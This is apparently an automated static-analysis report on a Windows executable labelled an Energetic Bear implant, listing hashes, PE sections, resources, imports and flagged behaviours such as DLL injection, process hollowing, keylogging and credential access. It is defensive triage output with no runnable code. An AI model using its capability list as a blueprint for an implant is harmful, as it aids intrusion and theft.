DETAILS:PROPERTIES

key value
Name x_energeticbear_x_energetic_bear_implant
md5 f901c645188f9c80afa8f49174f065ce
sha1 272bc9298b394760d68e14dcf479233800a098a9
sha256 9385d7e149bcda79e5a4291ad422c160be8297d029d04ee04c50240fe53aa900
ssdeep 24576:7MWHiFDV07ECXo4tu619SbX7ZwwjeJJV+CBqAKngHu8LNZZ/LJCPlyPlVzOCr:WJ6qbroCn8u8jhL0PMtVSCr
size 1.92MB
bytes 2008064
mime application/x-dosexec
extension None
Entropy 6.432133793497631 (Minimum: 0.0, Maximum: 8.0)

ENCODING:DETAILS

key value
charset binary
ForceEncoding utf-8
ByteOrderMark None

PE:GENERAL

key value
PE Type exe
Entrypoint 6951
Entrypoint Section .text
Header checksum 0x0
Verify checksum 0x1ef9c4
Match checksum False
Sig e968550000e9475e0300e9ca
imphash 6dfd283212216123373d6f57e66e4ef4
warning None
Timestamp 2017-05-11 04:57:16

PE:CHARACTERISTICS

key value
High Entropy True
aslr True
Force Integrity False
dep True
seh True
No Bind False
cfg False
No Isolation False
App Container False
wdm Driver False

PE:SECTIONS

Section Suspicious Size Entropy MD5 Description
.text No 375296 5.763015493521704 (Minimum: 0.0, Maximum: 8.0) 3529ef5fc304717c1961a0eaa46a0a4c code section
.rdata No 107008 4.696237877571576 (Minimum: 0.0, Maximum: 8.0) 99f4121ef2d6b9fa0edd78d09ae1df6f read-only initialized data section (ms and borland)
.data No 4096 1.65037735127028 (Minimum: 0.0, Maximum: 8.0) bb186fa87eaf3e725f1517b91f7b5a4e data section
.pdata No 18432 5.330196495202397 (Minimum: 0.0, Maximum: 8.0) ed9d9e6bd727c13b9e078f5ef2a34d67 exception handling functions section (pdata records)
.idata No 4608 3.796330539997049 (Minimum: 0.0, Maximum: 8.0) 712c3470a5943c3b9020ab5e78254efc initialized data section (borland)
.gfids No 1024 1.8275059276313794 (Minimum: 0.0, Maximum: 8.0) c4ad94585643ab7028a1c5e82c4c0c5f section added by new visual studio (14.0)
.00cfg True, 0.15517757530476972 512 0.15517757530476972 (Minimum: 0.0, Maximum: 8.0) b7c97bfc729e732ea987df623e7bc71b control flow guard
.rsrc True, 6.43192818127444 1488384 6.43192818127444 (Minimum: 0.0, Maximum: 8.0) 95ee475f64465c133088a29f3a86ccb3 resource section
.reloc No 7680 2.1363846100909862 (Minimum: 0.0, Maximum: 8.0) ac4f7eeceb6499d54734aea6597e5676 relocations section

PE:DLLS

Dll Description
KERNEL32.dll windows nt base api client dll
ole32.dll microsoft ole for windows

PE:RESOURCES

Resource Offset MD5 Sig Description
CYB 0xff558 a6c6c4423540e448ea146c58cb985f73 433a5c5c55736572735c5c37
LOL 0x84230 979128b6017961ec9f5b961ede4d8fb3 524946461cb3070041564920
RT_MANIFEST 0x1b2aa0 1e4a89b11eae0fcf8bb5fdd5ec3b6f61 3c3f786d6c2076657273696f side-by-side assembly manifest

PE:IMPORTED FUNCTIONS

Dll Function Description
KERNEL32.dll ExpandEnvironmentStringsW expands environment-variable strings and replaces them with the values defined for the current user. to specify the environment block for a particular user or the system, use the expandenvironmentstringsforuser function.
KERNEL32.dll CreateFileW creates or opens a file or i/o device. the most commonly used i/o devices are as follows: file, file stream, directory, physical disk, volume, console buffer, tape drive, communications resource, mailslot, and pipe. the function returns a handle that can be used to access the file or device for various types of i/o depending on the file or device and the flags and attributes specified. to perform this operation as a transacted operation, which results in a handle that can be used for transacted i/o, use the createfiletransacted function.
KERNEL32.dll WriteFile writes data to the specified file or input/output (i/o) device. this function is designed for both synchronous and asynchronous operation. for a similar function designed solely for asynchronous operation, see writefileex.
KERNEL32.dll CloseHandle closes an open object handle.
KERNEL32.dll LoadResource retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.
KERNEL32.dll LockResource retrieves a pointer to the specified resource in memory.
KERNEL32.dll SizeofResource retrieves the size, in bytes, of the specified resource.
KERNEL32.dll FindResourceA determines the location of a resource with the specified type and name in the specified module. to specify a language, use the findresourceex function.
KERNEL32.dll FlushFileBuffers flushes the buffers of a specified file and causes all buffered data to be written to a file.
KERNEL32.dll SetFilePointerEx moves the file pointer of the specified file.
KERNEL32.dll GetConsoleMode retrieves the current input mode of a console's input buffer or the current output mode of a console screen buffer.
KERNEL32.dll GetConsoleCP retrieves the input code page used by the console associated with the calling process. a console uses its input code page to translate keyboard input into the corresponding character value.
KERNEL32.dll IsDebuggerPresent determines whether the calling process is being debugged by a user-mode debugger.
KERNEL32.dll RaiseException raises an exception in the calling thread.
KERNEL32.dll MultiByteToWideChar maps a character string to a utf-16 (wide character) string. the character string is not necessarily from a multibyte character set. caution: using the multibytetowidechar function incorrectly can compromise the security of your application. calling this function can easily cause a buffer overrun because the size of the input buffer indicated by lpmultibytestr equals the number of bytes in the string, while the size of the output buffer indicated by lpwidecharstr equals the number of characters. to avoid a buffer overrun, your application must specify a buffer size appropriate for the data type the buffer receives. for more information, see security considerations: international features. note: the ansi code pages can be different on different computers, or can be changed for a single computer, leading to data corruption. for the most consistent results, applications should use unicode, such as utf-8 or utf-16, instead of a specific code page, unless legacy standards or data formats prevent the use of unicode. if using unicode is not possible, applications should tag the data stream with the appropriate encoding name when protocols allow it. html and xml files allow tagging, but text files do not.
KERNEL32.dll WideCharToMultiByte maps a utf-16 (wide character) string to a new character string. the new character string is not necessarily from a multibyte character set. caution: using the widechartomultibyte function incorrectly can compromise the security of your application. calling this function can easily cause a buffer overrun because the size of the input buffer indicated by lpwidecharstr equals the number of characters in the unicode string, while the size of the output buffer indicated by lpmultibytestr equals the number of bytes. to avoid a buffer overrun, your application must specify a buffer size appropriate for the data type the buffer receives. data converted from utf-16 to non-unicode encodings is subject to data loss, because a code page might not be able to represent every character used in the specific unicode data. for more information, see security considerations: international features. note: the ansi code pages can be different on different computers, or can be changed for a single computer, leading to data corruption. for the most consistent results, applications should use unicode, such as utf-8 or utf-16, instead of a specific code page, unless legacy standards or data formats prevent the use of unicode. if using unicode is not possible, applications should tag the data stream with the appropriate encoding name when protocols allow it. html and xml files allow tagging, but text files do not.
KERNEL32.dll RtlCaptureContext the rtlcapturecontext function retrieves a context record in the context of the caller.
KERNEL32.dll RtlLookupFunctionEntry searches the active function tables for an entry that corresponds to the specified pc value.
KERNEL32.dll RtlVirtualUnwind retrieves the invocation context of the function that precedes the specified function context. note: this function is not implemented on all processor platforms and the implementation is different on each platform that supports it. the following prototype lists all the potential parameters and their application. read further for processor-specific function prototypes.
KERNEL32.dll UnhandledExceptionFilter an application-defined function that passes unhandled exceptions to the debugger, if the process is being debugged. otherwise, it optionally displays an application error message box and causes the exception handler to be executed. this function can be called only from within the filter expression of an exception handler.
KERNEL32.dll SetUnhandledExceptionFilter enables an application to supersede the top-level exception handler of each thread of a process. after calling this function, if an exception occurs in a process that is not being debugged, and the exception makes it to the unhandled exception filter, that filter will call the exception filter function specified by the lptoplevelexceptionfilter parameter.
KERNEL32.dll GetCurrentProcess retrieves a pseudo handle for the current process.
KERNEL32.dll TerminateProcess terminates the specified process and all of its threads.
KERNEL32.dll IsProcessorFeaturePresent determines whether the specified processor feature is supported by the current computer.
KERNEL32.dll QueryPerformanceCounter retrieves the current value of the high-resolution performance counter.
KERNEL32.dll GetCurrentProcessId retrieves the process identifier of the calling process.
KERNEL32.dll GetCurrentThreadId retrieves the thread identifier of the calling thread.
KERNEL32.dll GetSystemTimeAsFileTime retrieves the current system date and time. the information is in coordinated universal time (utc) format.
KERNEL32.dll InitializeSListHead initializes the head of a singly linked list.
KERNEL32.dll GetStartupInfoW retrieves the contents of the startupinfo structure that was specified when the calling process was created.
KERNEL32.dll GetModuleHandleW retrieves a module handle for the specified module. the module must have been loaded by the calling process. to avoid the race conditions described in the remarks section, use the getmodulehandleex function.
KERNEL32.dll GetLastError retrieves the calling thread's last-error code value. the last-error code is maintained on a per-thread basis. multiple threads do not overwrite each other's last-error code. visual basic: applications should call err.lastdllerror instead of getlasterror.
KERNEL32.dll HeapAlloc allocates a block of memory from a heap. the allocated memory is not movable.
KERNEL32.dll HeapFree frees a memory block allocated from a heap by the heapalloc or heaprealloc function.
KERNEL32.dll GetProcessHeap retrieves a handle to the default heap of the calling process. this handle can then be used in subsequent calls to the heap functions.
KERNEL32.dll VirtualQuery retrieves information about a range of pages in the virtual address space of the calling process. to retrieve information about a range of pages in the address space of another process, use the virtualqueryex function.
KERNEL32.dll FreeLibrary frees the loaded dynamic-link library (dll) module and, if necessary, decrements its reference count. when the reference count reaches zero, the module is unloaded from the address space of the calling process and the handle is no longer valid.
KERNEL32.dll GetProcAddress retrieves the address of an exported function or variable from the specified dynamic-link library (dll).
KERNEL32.dll RtlUnwindEx initiates an unwind of procedure call frames.
KERNEL32.dll InterlockedPushEntrySList inserts an item at the front of a singly linked list. access to the list is synchronized on a multiprocessor system.
KERNEL32.dll InterlockedFlushSList removes all items from a singly linked list. access to the list is synchronized on a multiprocessor system.
KERNEL32.dll GetModuleFileNameW retrieves the fully qualified path for the file that contains the specified module. the module must have been loaded by the current process. to locate the file for a module that was loaded by another process, use the getmodulefilenameex function.
KERNEL32.dll LoadLibraryExW loads the specified module into the address space of the calling process. the specified module may cause other modules to be loaded.
KERNEL32.dll SetLastError sets the last-error code for the calling thread.
KERNEL32.dll EnterCriticalSection waits for ownership of the specified critical section object. the function returns when the calling thread is granted ownership.
KERNEL32.dll LeaveCriticalSection releases ownership of the specified critical section object.
KERNEL32.dll DeleteCriticalSection releases all resources used by an unowned critical section object.
KERNEL32.dll InitializeCriticalSectionAndSpinCount initializes a critical section object and sets the spin count for the critical section. when a thread tries to acquire a critical section that is locked, the thread spins: it enters a loop which iterates spin count times, checking to see if the lock is released. if the lock is not released before the loop finishes, the thread goes to sleep to wait for the lock to be released.
KERNEL32.dll TlsAlloc allocates a thread local storage (tls) index. any thread of the process can subsequently use this index to store and retrieve values that are local to the thread, because each thread receives its own slot for the index.
KERNEL32.dll TlsGetValue retrieves the value in the calling thread's thread local storage (tls) slot for the specified tls index. each thread of a process has its own slot for each tls index.
KERNEL32.dll TlsSetValue stores a value in the calling thread's thread local storage (tls) slot for the specified tls index. each thread of a process has its own slot for each tls index.
KERNEL32.dll TlsFree releases a thread local storage (tls) index, making it available for reuse.
KERNEL32.dll GetStdHandle retrieves a handle to the specified standard device (standard input, standard output, or standard error).
KERNEL32.dll GetModuleFileNameA retrieves the fully qualified path for the file that contains the specified module. the module must have been loaded by the current process. to locate the file for a module that was loaded by another process, use the getmodulefilenameex function.
KERNEL32.dll ExitProcess ends the calling process and all its threads.
KERNEL32.dll GetModuleHandleExW retrieves a module handle for the specified module and increments the module's reference count unless get_module_handle_ex_flag_unchanged_refcount is specified. the module must have been loaded by the calling process.
KERNEL32.dll GetACP retrieves the current windows ansi code page identifier for the operating system. caution: the ansi api functions, for example, the ansi version of textout, implicitly use getacp to translate text to or from unicode. for the multilingual user interface (mui) edition of windows, the system acp might not cover all code points in the user's selected logon language identifier. for compatibility with this edition, your application should avoid calls that depend on getacp either implicitly or explicitly, as this function can cause some locales to display text as question marks. instead, the application should use the unicode api functions directly, for example, the unicode version of textout.
KERNEL32.dll GetCurrentThread retrieves a pseudo handle for the calling thread.
KERNEL32.dll OutputDebugStringA sends a string to the debugger for display.
KERNEL32.dll OutputDebugStringW sends a string to the debugger for display.
KERNEL32.dll WaitForSingleObjectEx waits until the specified object is in the signaled state, an i/o completion routine or asynchronous procedure call (apc) is queued to the thread, or the time-out interval elapses. to wait for multiple objects, use the waitformultipleobjectsex.
KERNEL32.dll CreateThread the createthread function is a wrapper for the windows createthread function that should be used by the local security authority (lsa). it creates a thread that the lsa can track, attaches debugging information to threads it starts, and provides special exception handling to protect the lsa process.
KERNEL32.dll FindClose closes a file search handle opened by the findfirstfile, findfirstfileex, findfirstfilenamew, findfirstfilenametransactedw, findfirstfiletransacted, findfirststreamtransactedw, or findfirststreamw functions.
KERNEL32.dll FindFirstFileExA searches a directory for a file or subdirectory with a name and attributes that match those specified. for the most basic version of this function, see findfirstfile. to perform this operation as a transacted operation, use the findfirstfiletransacted function.
KERNEL32.dll FindFirstFileExW searches a directory for a file or subdirectory with a name and attributes that match those specified. for the most basic version of this function, see findfirstfile. to perform this operation as a transacted operation, use the findfirstfiletransacted function.
KERNEL32.dll FindNextFileA continues a file search from a previous call to the findfirstfile, findfirstfileex, or findfirstfiletransacted functions.
KERNEL32.dll FindNextFileW continues a file search from a previous call to the findfirstfile, findfirstfileex, or findfirstfiletransacted functions.
KERNEL32.dll IsValidCodePage determines if a specified code page is valid.
KERNEL32.dll GetOEMCP returns the current original equipment manufacturer (oem) code page identifier for the operating system. note: the ansi code pages can be different on different computers, or can be changed for a single computer, leading to data corruption. for the most consistent results, applications should use unicode, such as utf-8 or utf-16, instead of a specific code page.
KERNEL32.dll GetCPInfo retrieves information about any valid installed or available code page. note: to obtain additional information about valid installed or available code pages, the application should use getcpinfoex.
KERNEL32.dll GetCommandLineA retrieves the command-line string for the current process.
KERNEL32.dll GetCommandLineW retrieves the command-line string for the current process.
KERNEL32.dll GetEnvironmentStringsW retrieves the environment variables for the current process.
KERNEL32.dll FreeEnvironmentStringsW frees a block of environment strings.
KERNEL32.dll SetEnvironmentVariableA sets the contents of the specified environment variable for the current process.
KERNEL32.dll SetEnvironmentVariableW sets the contents of the specified environment variable for the current process.
KERNEL32.dll GetDateFormatW formats a date as a date string for a locale specified by the locale identifier. the function formats either a specified date or the local system date. note: for interoperability reasons, the application should prefer the getdateformatex function to getdateformat because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. any application that will be run only on windows vista and later should use getdateformatex.
KERNEL32.dll GetTimeFormatW formats time as a time string for a locale specified by identifier. the function formats either a specified time or the local system time. note: for interoperability reasons, the application should prefer the gettimeformatex function to gettimeformat because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. any application that will be run only on windows vista and later should use gettimeformatex.
KERNEL32.dll CompareStringW compares two character strings, for a locale specified by identifier. caution: using comparestring incorrectly can compromise the security of your application. strings that are not compared correctly can produce invalid input. for example, the function can raise security issues when used for a non-linguistic comparison, because two strings that are distinct in their binary representation can be linguistically equivalent. the application should test strings for validity before using them, and should provide error handlers. for more information, see security considerations: international features. note: for compatibility with unicode, your applications should prefer comparestringex or the unicode version of comparestring. another reason for preferring comparestringex is that microsoft is migrating toward the use of locale names instead of locale identifiers for new locales, for interoperability reasons. any application that will be run only on windows vista and later should use comparestringex.
KERNEL32.dll LCMapStringW for a locale specified by identifier, maps one input character string to another using a specified transformation, or generates a sort key for the input string. note: for interoperability reasons, the application should prefer the lcmapstringex function to lcmapstring because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. this recommendation applies especially to custom locales, including those created by microsoft. any application that will be run only on windows vista and later should use lcmapstringex.
KERNEL32.dll GetLocaleInfoW retrieves information about a locale specified by identifier. note: for interoperability reasons, the application should prefer the getlocaleinfoex function to getlocaleinfo because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. any application that runs only on windows vista and later should use getlocaleinfoex.
KERNEL32.dll IsValidLocale determines if the specified locale is installed or supported on the operating system. for more information, see locales and languages.
KERNEL32.dll GetUserDefaultLCID returns the locale identifier for the user default locale. caution: if the user default locale is a custom locale, an application cannot accurately tag data with the value or exchange it. in this case, the application should use getuserdefaultlocalename in preference to getuserdefaultlcid. note: applications that are intended to run only on windows vista and later should use getuserdefaultlocalename.
KERNEL32.dll EnumSystemLocalesW enumerates the locales that are either installed on or supported by an operating system. note: for interoperability reasons, the application should prefer the enumsystemlocalesex function to enumsystemlocales because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. any application that will be run only on windows vista and later should use enumsystemlocalesex.
KERNEL32.dll SetStdHandle sets the handle for the specified standard device (standard input, standard output, or standard error).
KERNEL32.dll GetFileType retrieves the file type of the specified file.
KERNEL32.dll GetStringTypeW retrieves character type information for the characters in the specified unicode source string. for each character in the string, the function sets one or more bits in the corresponding 16-bit element of the output array. each bit identifies a given character type, for example, letter, digit, or neither. caution: using the getstringtypew function incorrectly can compromise the security of your application. to avoid a buffer overflow, the application must set the output buffer size correctly. for more security information, see security considerations: windows user interface.
KERNEL32.dll SetConsoleCtrlHandler adds or removes an application-defined handlerroutine function from the list of handler functions for the calling process. if no handler function is specified, the function sets an inheritable attribute that determines whether the calling process ignores ctrl+c signals.
KERNEL32.dll HeapSize retrieves the size of a memory block allocated from a heap by the heapalloc or heaprealloc function.
KERNEL32.dll HeapReAlloc reallocates a block of memory from a heap. this function enables you to resize a memory block and change other memory block properties. the allocated memory is not movable.
KERNEL32.dll WriteConsoleW writes a character string to a console screen buffer beginning at the current cursor location.
ole32.dll CoCreateInstance creates a single uninitialized object of the class associated with a specified clsid. call cocreateinstance when you want to create only one object on the local system. to create a single object on a remote system, call the cocreateinstanceex function. to create multiple objects based on a single clsid, call the cogetclassobject function.
ole32.dll CoUninitialize closes the com library on the current thread, unloads all dlls loaded by the thread, frees any other resources that the thread maintains, and forces all rpc connections on the thread to close.
ole32.dll CoInitialize initializes the com library on the current thread and identifies the concurrency model as single-thread apartment (sta). new applications should call coinitializeex instead of coinitialize. if you want to use the windows runtime, you must call windows::foundation::initialize instead.

PE:MANIFEST

Manifest
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

BEHAVIOR:INTELL

Matched Required Behavior Detected
4 4 DLL injection openprocess,virtualallocex,writevirtualmemory,createremotethread
5 5 DLL injection openprocess,virtualallocex,writevirtualmemory,openthread,queueuserapc
4 4 DLL injection openprocess,virtualallocex,writevirtualmemory,rtlcreateuserthread
5 5 DLL injection openprocess,virtualallocex,writevirtualmemory,getthreadcontext,setthreadcontext
1 1 Mutex functionality createmutex
2 1 Get folder location gettemppath,shgetfolderpath
2 1 Keyboard functionality getasynckeystate,getkeystate
1 1 Keylogger functionality mapvirtualkey
4 1 Privileges interaction adjusttokenprivileges,lsaenumeratelogonsessions,samigetprivatedata,lookupprivilegevalue
2 1 Dynamic loading loadlibrary,getprocaddress
1 1 Time interaction getsystemtime
1 1 Atom interaction queueuserapc
3 3 Process Hollowing writevirtualmemory,setthreadcontext,resumethread
1 1 Process Hollowing unmapviewofsection
3 1 Registry interaction regopenkey,regqueryvalue,regclosekey
6 1 Service interaction openservice,startservice,createservice,deleteservice,startservicectrldispatcher,controlservice
1 1 Load driver zwloaddriver
1 1 Driver interaction deviceiocontrol
6 1 File IO createfile,writefile,getfilesize,readfile,deletefile,getfiletype
3 1 Creating process createprocess,shellexecute,winexec
1 1 Unpacking functionality decompressbuffer
2 2 Packer functionality virtualalloc,virtualprotect
3 1 Screenshot functionality bitblt,getdc,releasedc
11 1 Networking using socket accept,bind,connect,close,gethostbyname,errno,inet_aton,listen,recv,select,send
7 1 Networking using WinInet internetopen,internetconnect,internetopenurl,httpopenrequest,httpsendrequest,internetreadfile,internetwritefile
4 1 Networking using Winsock2 wsarecv,wsasend,wsastartup,wsacleanup
4 1 Networking using URLMon urlopenpullstream,urldownloadtofile,urldownloadtocachefile,urlopenstream
1 1 Username enumeration getusername
1 1 System enumeration getversion
5 1 Debugger detection isdebuggerpresent,checkremotedebuggerpresent,outputdebugstring,findclose,debugactiveprocess
2 1 COM interaction coinitialize,cocreateinstance
1 1 Credential interaction lsaenumeratelogonsessions
1 1 Volume information getvolumeinformation
2 1 System information getsysteminfo,getsystemmetrics
1 1 Version information getversion
2 1 Token information openprocesstoken,gettokeninformation
4 1 White list getcommandline,getmodulehandle,getstartupinfo,getversion
4 1 SEH information addvectoredexceptionhandler,removevectoredexceptionhandler,xcptfilter,vbaexcepthandler
1 1 Network enumeration netshareenum
1 1 Process enumeration createtoolhelp32snapshot

XREFS:TEXT

From To
sub.LOL_12 sym.imp.KERNEL32.dll_ExpandEnvironmentStringsW
sub.LOL_12 sym.imp.KERNEL32.dll_CreateFileW
sub.LOL_12 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_GetStdHandle_210 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_WriteFile_ad8 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_WriteFile_c20 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_WriteFile
sub.LOL_12 sym.imp.KERNEL32.dll_CloseHandle
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_CloseHandle
sub.LOL_12 sym.imp.KERNEL32.dll_LoadResource
sub.LOL_12 sym.imp.KERNEL32.dll_LockResource
sub.LOL_12 sym.imp.KERNEL32.dll_SizeofResource
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.LOL_12 sym.imp.KERNEL32.dll_FindResourceA
sub.KERNEL32.dll_SetFilePointerEx_708 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_GetConsoleCP
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_RaiseException_b0 sym.imp.KERNEL32.dll_RaiseException
sub.KERNEL32.dll_RaiseException_100 sym.imp.KERNEL32.dll_RaiseException
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_bb8 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_bb8 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_bb8 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_bb8 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab4 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab4 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
loc.140008a30 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
